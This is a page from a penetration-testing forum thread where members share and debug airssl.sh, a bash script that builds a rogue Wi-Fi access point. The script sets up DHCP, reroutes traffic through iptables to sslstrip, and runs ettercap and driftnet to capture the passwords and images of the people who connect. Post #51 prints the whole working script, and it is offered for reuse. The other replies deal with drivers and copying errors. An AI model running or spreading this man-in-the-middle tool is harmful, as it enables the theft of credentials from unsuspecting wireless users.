Page 6 of 9 FirstFirst ... 45678 ... LastLast
Results 51 to 60 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #51
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I still dont have DHCP working but I did hack this script up a bit as well.. hope you like my modifications

    the biggest thing I wanted to add was a --cleanup process so that it no longer messed things up for me while trying to troubleshoot the DHCP issue. I assume my problem is something with my wireless drivers and injection even if it works else where.. dont know yet.

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - SpudGunMan 2010
    # airssl.sh - v1.2
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    ## set the subnet for DHCP handed out to the FAKEAP Wireless CLients
    fakeAPnet=10.0.0.0 #network for dhcp
    fakeAPSubnetMask=255.255.255.0 #subnet for dhcp
    fakeAPat0Address=10.0.0.1 #the interface address and gateway for the fakeAP dhcp
    fakeAPdns=8.8.8.8 #a valid DNS server
    fakeAPrange="10.0.0.20 10.0.0.50" #string for the range
    
    CleanUp ()
    {
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Check if clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    rm -f airssl-cleanup
    exit
    }
    
    initalize(){
    # Network questions
    echo
    echo "===========Internet Connection Information========="
    route -n -A inet | grep UG
    echo "====Airmon Check Output (Should be no errors)======"
    airmon-ng check
    echo "====Airmon Output (FakeAP Wireless Interface)======"
    airmon-ng
    echo
    echo
    read -r -p "Enter Default gateway IP address, this is listed above. example 192.168.1.254: " gatewayip
    read -r -p "Enter interface connected to the internet, this is listed above. example wlan0: " internet_interface
    read -r -p "Enter your interface to be used for the fake AP, for example wlan1: " fakeap_interface
    fakeap=$fakeap_interface
    read -r -p "Enter the ESSID you would like your rogue AP to be called: " ESSID
    airmon-ng start $fakeap_interface
    read -r -p "Enter interface for fake AP, after airmon-ng processing example mon0: " fakeap_interface
    }
    # Clean up command line
    if [ "$1" = "--cleanup" ] ; then
    echo "[+] Previous Job Settings will be used"
    . airssl-cleanup
    CleanUp
    elif [ "$1" != "" ]; then
    echo
    echo "Fake AP with SSL Strip"
    echo "to cleanup last job run airssl.sh --cleanup"
    exit
    else
    echo "Fake AP - SSL Strip"
    fi
    initalize
    echo
    echo "Default/Networks Gateway: "$gatewayip
    echo "Default/Networks Gateway Interface: "$internet_interface
    echo "FakeAP ESSID: "$ESSID
    echo "FakeAP Fake Interface: "$fakeap_interface
    echo
    echo 
    read -r -n 1 -p "Is this information correct? (y/n)" ANSWER
    if [ $ANSWER = "y" ] ; then
    echo "[+] Settings will be used"
    else
    echo "[+] airmon cleanup"
    airmon-ng stop $fakeap_interface
    initalize
    fi
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet $fakeAPnet netmask $fakeAPSubnetMask {
    option routers $fakeAPat0Address;
    option subnet-mask $fakeAPSubnetMask;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers $fakeAPdns;
    
    range $fakeAPrange;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    read -r -n 1 -p "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... y or n or (a)All?" ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring interface and clear tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 $fakeAPat0Address netmask $fakeAPSubnetMask
    ifconfig at0 mtu 1400
    route add -net $fakeAPnet netmask $fakeAPSubnetMask gw $fakeAPat0Address
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 10
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Configuring sslstrip..."
    read -r -n 1 -p "Would you like to Start SSLstrip?, y or n " STRIP
    echo
    if [ $STRIP = "y" ] ; then
    echo "[+] Configuring iptables for sslstrip..."
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    else
    echo "[+] Configuring iptables without sslstrip..."
    iptables -X
    iptables -F
    iptables -A FORWARD -i at0 -o $internet_interface -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    fi
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    read -r -n 1 -p "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n " ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    read -r -n 1 -p "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n " DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    
    if [ $STRIP = "y" ] ; then
    echo "[+] Starting sslstrip logging..."
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    sleep 2
    fi
    
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo
    echo "After you have finished please close airssl and clean up properly by hitting y"
    echo "if airssl is not cleaned up properly ERRORS WILL OCCUR"
    echo "otherwise you can clean up later with the airssl --cleanup command"
    read -r -n 1 -p "(press y to cleanup now)" WISH
    
    # Clean up
    if [ "$WISH" = "y" ] ; then
    CleanUp
    else
    save=$'\n'
    echo -n "#cleanup process information"$'\n' > airssl-cleanup
    echo -n "fakeapid="$fakeapid$'\n' >> airssl-cleanup
    echo -n "dchpid="$dchpid$'\n' >> airssl-cleanup
    echo -n "sslstripid="$sslstripid$'\n' >> airssl-cleanup
    echo -n "ettercapid="$ettercapid$'\n' >> airssl-cleanup
    echo -n "dritnetid="$dritnetid$'\n' >> airssl-cleanup
    echo -n "sslstriplogid="$sslstriplogid$'\n' >> airssl-cleanup
    echo -n "fakeap_interface="$fakeap_interface$'\n' >> airssl-cleanup
    echo -n "fakeap="$fakeap$'\n' >> airssl-cleanup
    fi
    
    exit
    Last edited by spudgunman; 11-15-2010 at 06:51 PM. Reason: fix typo

  2. #52
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Just tested your version of the script and DHCP seems to work fine on my test hardware. I will give the whole script a try and see if its easier to work with than my current one.

    J

  3. #53
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    can I ask what wireless card/drivers you use? I have found info along these lines Debian User Forums • View topic - ath5k droping packets that indicate its just my wireless drivers that are causing the failure

  4. #54
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Working on a Dell Latitude D420.

    Got the following internal interfaces, i use these to connect to the internet:
    iwl3945: Intel(R) PRO/Wireless 3945ABG/BG - Internal Wireless
    Tigon3 [partno(BCM5752KFBG) rev 6002] (PCI Express) - Internal Wired LAN

    Then I have the following PC-Cards (use these for scanning/injection):

    • Netgear WG511T - Atheros chipset
    • Generic PCMCIA Wireless card i have had for years, no idea what it is though. DMESG shows the
      following on insertion for the 2 cards:


    Code:
    pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
    pci 0000:03:00.0: reg 10: [mem 0x00000000-0x00001fff]
    pci 0000:03:00.0: supports D1 D2
    pci 0000:03:00.0: PME# supported from D0 D1 D2 D3hot D3cold
    pci 0000:03:00.0: PME# disabled
    pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x68001fff]
    pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x68001fff] (PCI address [0x68000000-0x68001fff]
    p54pci 0000:03:00.0: enabling device (0000 -> 0002)
    p54pci 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
    p54pci 0000:03:00.0: setting latency timer to 64
    p54pci 0000:03:00.0: firmware: requesting isl3886pci
    phy3: p54 detected a LM86 firmware
    p54: rx_mtu reduced from 3240 to 2376
    phy3: FW rev 2.13.12.0 - Softmac protocol 5.9
    phy3: cryptographic accelerator WEP:YES, TKIP:YES, CCMP:YES
    phy3: hwaddr 00:e0:98:b4:2b:3b, MAC:isl3890 RF:Frisbee
    phy3: Selected rate control algorithm 'minstrel'
    Registered led device: p54-phy3::assoc
    Registered led device: p54-phy3::tx
    Registered led device: p54-phy3::rx
    Registered led device: p54-phy3::radio
    p54pci 0000:03:00.0: is registered as 'phy3'
    Code:
    pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
    pci 0000:03:00.0: reg 10: [mem 0x00000000-0x0000ffff]
    pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x6800ffff]
    pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x6800ffff] (PCI address [0x68000000-0x6800ffff]
    ath5k 0000:03:00.0: enabling device (0000 -> 0002)
    ath5k 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
    ath5k 0000:03:00.0: registered as 'phy4'
    ath: EEPROM regdomain: 0x0
    ath: EEPROM indicates default country code should be used
    ath: doing EEPROM country->regdmn map search
    ath: country maps to regdmn code: 0x3a
    ath: Country alpha2 being used: US
    ath: Regpair used: 0x3a
    phy4: Selected rate control algorithm 'minstrel'
    ath5k phy4: Atheros AR5212 chip found (MAC: 0x56, PHY: 0x41)
    ath5k phy4: RF2112B 2GHz radio found (0x46)
    cfg80211: Calling CRDA for country: US
    cfg80211: Regulatory domain changed to country: US
        (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
        (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
        (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
        (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
        (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
        (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)

  5. #55
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Update g60jon, and all. I have been trying for a while to get the r8187 driver to work properly when responding to all probes, but it created numerous other problems, in the end I decided the rtl8187 driver should be used. After coming to this thread to edit a few things and grab the script it appears g60jon had done pretty much what I wanted to do to the script (which has been turned in to airssl 2.0). Airssl 2.0 now uses rtl8187 which has added the use of responding to all probes "properly", the tutorial and script have been updated, and I have noted you g60jon.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #56
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello GuyZ! I am trying to make the script by copying it and paste it in a notepad, but i am getting errors and "command not found"... I am sure that i make mistake into some line, but i cant get it working...
    Can someone upload the working script somewhere, so i can download it?

    Thanks in advance!

  7. #57
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by miata View Post
    Hello GuyZ! I am trying to make the script by copying it and paste it in a notepad, but i am getting errors and "command not found"... I am sure that i make mistake into some line, but i cant get it working...
    Can someone upload the working script somewhere, so i can download it?

    Thanks in advance!
    Notepad ? I think you should first get some basic knowledge than learn what the script actually does before you start playing with these things.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  8. #58
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    In my Windows machine ( the one i am typing now), i paste the script into a notepad, then rename it to airssl.sh and then copy to my eee pc runing BT4 r2 live .
    All i'd like (if possible) is the airssl.sh file to find out what i am doing wrong! ( chmod are done).

    Thanks!

  9. #59
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    The script is in the second post, also without an exact error message no one will be able to help you.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  10. #60
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Got it working!

    In BackTrack, i made a new text file and pasted the script from the one i made with notepad. It worked, although i couldn't find any difference...
    Thanks and sorry for nagging!

Page 6 of 9 FirstFirst ... 45678 ... LastLast

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •